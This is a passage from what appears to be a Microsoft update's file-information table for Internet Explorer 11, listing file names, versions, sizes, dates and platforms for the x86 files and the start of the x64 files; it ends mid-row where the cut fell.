\nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 01:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 01:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 01:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 01:21| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 45,056| 23-Nov-2019| 01:22| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 01:22| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 01:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 01:24| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 39,936| 23-Nov-2019| 01:25| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 01:26| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 01:26| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 01:27| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 01:28| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 01:29| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 01:30| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 01:30| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 01:31| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 01:32| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 01:33| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 01:34| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 01:35| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 01:35| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 01:36| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 01:37| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 01:38| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 01:38| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 01:39| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 01:40| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 01:41| Not applicable \nJsproxy.dll| 11.0.9600.19572| 47,104| 19-Nov-2019| 07:53| x86 \nWininet.dll| 11.0.9600.19572| 4,387,840| 19-Nov-2019| 07:05| x86 \nInetcpl.cpl.mui| 11.0.9600.19572| 114,176| 23-Nov-2019| 01:13| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,560| 23-Nov-2019| 01:14| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,928| 23-Nov-2019| 01:15| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 122,880| 23-Nov-2019| 01:16| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,048| 23-Nov-2019| 01:17| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 138,240| 23-Nov-2019| 01:17| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 114,688| 23-Nov-2019| 02:38| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 131,584| 23-Nov-2019| 01:18| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 117,760| 23-Nov-2019| 01:19| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 122,368| 23-Nov-2019| 01:20| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 134,144| 23-Nov-2019| 01:21| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 107,008| 23-Nov-2019| 01:21| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,392| 23-Nov-2019| 01:22| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 127,488| 23-Nov-2019| 01:23| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 128,512| 23-Nov-2019| 01:24| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 88,576| 23-Nov-2019| 01:25| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 82,944| 23-Nov-2019| 01:25| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,440| 23-Nov-2019| 01:26| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,392| 23-Nov-2019| 01:27| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 120,320| 23-Nov-2019| 01:28| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,560| 23-Nov-2019| 01:29| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 01:29| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,952| 23-Nov-2019| 01:30| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 01:31| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 128,000| 23-Nov-2019| 01:32| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 01:33| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 129,024| 23-Nov-2019| 01:34| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 01:34| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,416| 23-Nov-2019| 01:36| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 121,856| 23-Nov-2019| 01:36| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 115,712| 23-Nov-2019| 01:37| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 123,904| 23-Nov-2019| 01:38| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 125,440| 23-Nov-2019| 01:38| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 72,704| 23-Nov-2019| 01:40| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 73,728| 23-Nov-2019| 01:40| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 73,728| 23-Nov-2019| 01:41| Not applicable \nMicrosoft-windows-ie-htmlrendering.ptxml| Not applicable| 3,228| 19-Nov-2019| 05:34| Not applicable \nMshtml.dll| 11.0.9600.19572| 20,290,048| 19-Nov-2019| 08:17| x86 \nMshtml.tlb| 11.0.9600.19572| 2,724,864| 19-Nov-2019| 08:11| Not applicable \nIeproxy.dll| 11.0.9600.19572| 301,056| 19-Nov-2019| 06:57| x86 \nIeshims.dll| 11.0.9600.19572| 290,304| 19-Nov-2019| 07:02| x86 \nIertutil.dll| 11.0.9600.19572| 2,304,000| 19-Nov-2019| 07:56| x86 \nSqmapi.dll| 6.2.9200.16384| 228,232| 23-Nov-2019| 01:12| x86 \nIeframe.dll.mui| 11.0.9600.19572| 2,066,432| 23-Nov-2019| 01:14| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,120,704| 23-Nov-2019| 01:14| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,075,136| 23-Nov-2019| 01:15| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,063,360| 23-Nov-2019| 01:16| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,313,728| 23-Nov-2019| 01:17| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,390,016| 23-Nov-2019| 01:18| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,032,640| 23-Nov-2019| 02:38| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,307,584| 23-Nov-2019| 01:19| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,255,360| 23-Nov-2019| 01:19| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,061,312| 23-Nov-2019| 01:20| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,325,504| 23-Nov-2019| 01:21| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,019,840| 23-Nov-2019| 01:22| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,070,528| 23-Nov-2019| 01:23| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,082,304| 23-Nov-2019| 01:23| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,307,072| 23-Nov-2019| 01:24| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,170,368| 23-Nov-2019| 01:25| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,153,984| 23-Nov-2019| 01:26| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,291,712| 23-Nov-2019| 01:27| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,283,520| 23-Nov-2019| 01:28| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,051,584| 23-Nov-2019| 01:28| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,301,440| 23-Nov-2019| 01:29| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,093,056| 23-Nov-2019| 01:30| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,075,136| 23-Nov-2019| 01:31| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,298,880| 23-Nov-2019| 01:32| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,094,080| 23-Nov-2019| 01:32| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,316,800| 23-Nov-2019| 01:33| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,305,024| 23-Nov-2019| 01:34| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,278,912| 23-Nov-2019| 01:35| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,277,888| 23-Nov-2019| 01:36| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,059,776| 23-Nov-2019| 01:36| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,315,264| 23-Nov-2019| 01:37| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,278,912| 23-Nov-2019| 01:38| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,324,480| 23-Nov-2019| 01:39| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 2,098,176| 23-Nov-2019| 01:40| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 1,890,304| 23-Nov-2019| 01:41| Not applicable \nIeframe.dll.mui| 11.0.9600.19572| 1,890,304| 23-Nov-2019| 01:42| Not applicable \nIeframe.dll| 11.0.9600.19572| 13,838,336| 19-Nov-2019| 07:20| x86 \nIeframe.ptxml| Not applicable| 24,486| 19-Nov-2019| 05:34| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:13| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:14| Not applicable \nInetres.adml| Not applicable| 523,798| 23-Nov-2019| 01:15| Not applicable \nInetres.adml| Not applicable| 497,168| 23-Nov-2019| 01:16| Not applicable \nInetres.adml| Not applicable| 549,601| 23-Nov-2019| 01:16| Not applicable \nInetres.adml| Not applicable| 938,813| 23-Nov-2019| 01:17| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 02:38| Not applicable \nInetres.adml| Not applicable| 541,364| 23-Nov-2019| 01:18| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:19| Not applicable \nInetres.adml| Not applicable| 523,828| 23-Nov-2019| 01:20| Not applicable \nInetres.adml| Not applicable| 573,051| 23-Nov-2019| 01:21| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:21| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:22| Not applicable \nInetres.adml| Not applicable| 567,797| 23-Nov-2019| 01:23| Not applicable \nInetres.adml| Not applicable| 545,645| 23-Nov-2019| 01:24| Not applicable \nInetres.adml| Not applicable| 635,718| 23-Nov-2019| 01:25| Not applicable \nInetres.adml| Not applicable| 522,947| 23-Nov-2019| 01:25| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:26| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:27| Not applicable \nInetres.adml| Not applicable| 486,171| 23-Nov-2019| 01:28| Not applicable \nInetres.adml| Not applicable| 546,070| 23-Nov-2019| 01:29| Not applicable \nInetres.adml| Not applicable| 556,258| 23-Nov-2019| 01:29| Not applicable \nInetres.adml| Not applicable| 532,548| 23-Nov-2019| 01:30| Not applicable \nInetres.adml| Not applicable| 539,045| 23-Nov-2019| 01:31| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:32| Not applicable \nInetres.adml| Not applicable| 799,803| 23-Nov-2019| 01:33| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:34| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:34| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:35| Not applicable \nInetres.adml| Not applicable| 501,599| 23-Nov-2019| 01:36| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:37| Not applicable \nInetres.adml| Not applicable| 518,930| 23-Nov-2019| 01:38| Not applicable \nInetres.adml| Not applicable| 455,538| 23-Nov-2019| 01:39| Not applicable \nInetres.adml| Not applicable| 418,138| 23-Nov-2019| 01:39| Not applicable \nInetres.adml| Not applicable| 434,747| 23-Nov-2019| 01:40| Not applicable \nInetres.adml| Not applicable| 434,747| 23-Nov-2019| 01:41| Not applicable \nInetres.admx| Not applicable| 1,675,975| 25-Oct-2019| 04:30| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,184| 23-Nov-2019| 01:14| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:14| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 01:15| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 01:16| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 01:16| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 37,888| 23-Nov-2019| 01:17| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 02:38| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 01:18| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:19| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 01:20| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 01:21| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 27,648| 23-Nov-2019| 01:21| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:22| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 01:23| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,792| 23-Nov-2019| 01:24| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 23,040| 23-Nov-2019| 01:25| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 22,016| 23-Nov-2019| 01:25| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:27| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:27| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 31,232| 23-Nov-2019| 01:28| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,304| 23-Nov-2019| 01:29| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 01:29| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 01:30| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 01:31| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:32| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 34,816| 23-Nov-2019| 01:33| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 33,280| 23-Nov-2019| 01:34| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,256| 23-Nov-2019| 01:34| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:35| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 32,768| 23-Nov-2019| 01:36| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:37| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 01:38| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 29,696| 23-Nov-2019| 01:39| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,384| 23-Nov-2019| 01:39| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,896| 23-Nov-2019| 01:40| Not applicable \nJscript9.dll.mui| 11.0.9600.19572| 16,896| 23-Nov-2019| 01:41| Not applicable \nJscript9.dll| 11.0.9600.19572| 4,112,384| 19-Nov-2019| 07:26| x86 \nJscript9diag.dll| 11.0.9600.19572| 620,032| 19-Nov-2019| 07:49| x86 \nJscript.dll| 5.8.9600.19572| 662,528| 19-Nov-2019| 07:49| x86 \nVbscript.dll| 5.8.9600.19573| 496,640| 21-Nov-2019| 02:16| x86 \n \n## Internet Explorer 11 on all supported x64-based versions\n\n**File name**| **File version**| **File size**| **Date**| **Time**| **Platform** \n---|---|---|---|---|--- \nUrlmon.dll| 11.0.9600.19572| 1,566,720| 19-Nov-2019| 19:15| x64 \nIexplore.exe| 11.0.9600.19572| 810,592| 23-Nov-2019| 02:03| x64 \nWininet.dll.mui| 11.0.9600.19572| 46,592| 23-Nov-2019| 02:04| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 02:05| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 02:06| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 02:07| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 56,320| 23-Nov-2019| 02:07| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 57,856| 23-Nov-2019| 02:08| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 03:32| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 02:09| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 02:10| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 02:11| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 55,296| 23-Nov-2019| 02:11| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 45,056| 23-Nov-2019| 02:12| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 02:13| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 02:14| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,248| 23-Nov-2019| 02:15| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 02:16| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 35,840| 23-Nov-2019| 02:17| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 02:17| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 02:19| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 02:19| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 02:20| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,760| 23-Nov-2019| 02:20| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 02:21| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 02:22| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 02:23| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 02:24| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 53,248| 23-Nov-2019| 02:25| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 52,736| 23-Nov-2019| 02:25| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 02:26| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 02:27| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 02:28| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 02:28| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 02:29| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 02:30| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 02:31| Not applicable \nWininet.dll.mui| 11.0.9600.19572| 30,720| 23-Nov-2019| 02:31| Not applicable \nInetcpl.cpl| 11.0.9600.19572| 2,132,992| 19-Nov-2019| 19:39| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 307,200| 23-Nov-2019| 02:04| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 293,888| 23-Nov-2019| 02:06| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,304| 23-Nov-2019| 02:06| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 289,280| 23-Nov-2019| 02:07| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 299,008| 23-Nov-2019| 02:08| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 303,104| 23-Nov-2019| 02:08| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 282,112| 23-Nov-2019| 03:32| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 296,960| 23-Nov-2019| 02:09| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 283,648| 23-Nov-2019| 02:10| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 291,840| 23-Nov-2019| 02:11| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 299,520| 23-Nov-2019| 02:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 275,968| 23-Nov-2019| 02:12| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 23-Nov-2019| 02:14| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 293,376| 23-Nov-2019| 02:14| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 296,960| 23-Nov-2019| 02:15| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 258,048| 23-Nov-2019| 02:16| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 256,512| 23-Nov-2019| 02:16| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 289,280| 23-Nov-2019| 02:18| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 288,256| 23-Nov-2019| 02:18| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 285,184| 23-Nov-2019| 02:19| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 295,424| 23-Nov-2019| 02:20| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 297,472| 23-Nov-2019| 02:21| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,864| 23-Nov-2019| 02:21| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 295,424| 23-Nov-2019| 02:22| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 294,400| 23-Nov-2019| 02:23| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 294,400| 23-Nov-2019| 02:24| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,864| 23-Nov-2019| 02:25| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 290,816| 23-Nov-2019| 02:25| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 288,768| 23-Nov-2019| 02:26| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 286,208| 23-Nov-2019| 02:27| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 281,600| 23-Nov-2019| 02:28| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 286,720| 23-Nov-2019| 02:28| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 292,352| 23-Nov-2019| 02:29| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 242,176| 23-Nov-2019| 02:30| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 243,200| 23-Nov-2019| 02:31| Not applicable \nMshtml.dll.mui| 11.0.9600.19572| 243,200| 23-Nov-2019| 02:32| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 46,080| 23-Nov-2019| 02:04| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 02:05| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 02:06| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 02:07| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 51,712| 23-Nov-2019| 02:08| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 54,272| 23-Nov-2019| 02:08| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 03:32| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 02:09| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 02:10| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 02:11| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 02:11| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 45,056| 23-Nov-2019| 02:12| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 02:13| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 02:14| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 02:15| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 39,936| 23-Nov-2019| 02:16| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 39,424| 23-Nov-2019| 02:16| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 02:18| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 47,616| 23-Nov-2019| 02:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 02:19| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 51,200| 23-Nov-2019| 02:20| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,688| 23-Nov-2019| 02:21| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 02:21| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 02:22| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 02:23| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 02:24| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 50,176| 23-Nov-2019| 02:25| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 02:25| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,664| 23-Nov-2019| 02:26| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,640| 23-Nov-2019| 02:27| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 02:27| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 49,152| 23-Nov-2019| 02:28| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 48,128| 23-Nov-2019| 02:29| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 02:30| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 02:31| Not applicable \nUrlmon.dll.mui| 11.0.9600.19572| 35,328| 23-Nov-2019| 02:32| Not applicable \nJsproxy.dll| 11.0.9600.19572| 54,784| 19-Nov-2019| 20:22| x64 \nWininet.dll| 11.0.9600.19572| 4,859,392| 19-Nov-2019| 19:26| x64 \nInetcpl.cpl.mui| 11.0.9600.19572| 114,176| 23-Nov-2019| 02:04| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,560| 23-Nov-2019| 02:05| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 124,928| 23-Nov-2019| 02:06| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 122,880| 23-Nov-2019| 02:07| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 130,048| 23-Nov-2019| 02:08| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 138,240| 23-Nov-2019| 02:08| Not applicable \nInetcpl.cpl.mui| 11.0.9600.19572| 114,688| 